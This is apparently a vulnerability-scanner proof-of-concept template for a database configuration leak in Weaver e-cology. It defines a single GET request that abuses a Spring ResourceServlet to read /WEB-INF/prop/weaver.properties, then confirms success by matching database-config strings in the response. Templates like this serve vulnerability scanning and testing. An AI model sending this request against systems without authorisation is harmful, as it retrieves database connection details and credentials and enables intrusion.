name: poc-yaml-weaver-ecology-database-config-leak
rules:
  - method: GET
    path: /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/prop/weaver.properties
    follow_redirects: true
    expression:
      response.status == 200 && response.body.bcontains(b"ecology.url") && response.body.bcontains(b"DriverClasses")
detail:
  author: sakura404x
  links:
    - https://github.com/jas502n/DBconfigReader/blob/8654f58f49c75f051448977699adc85c0998594a/README.md 
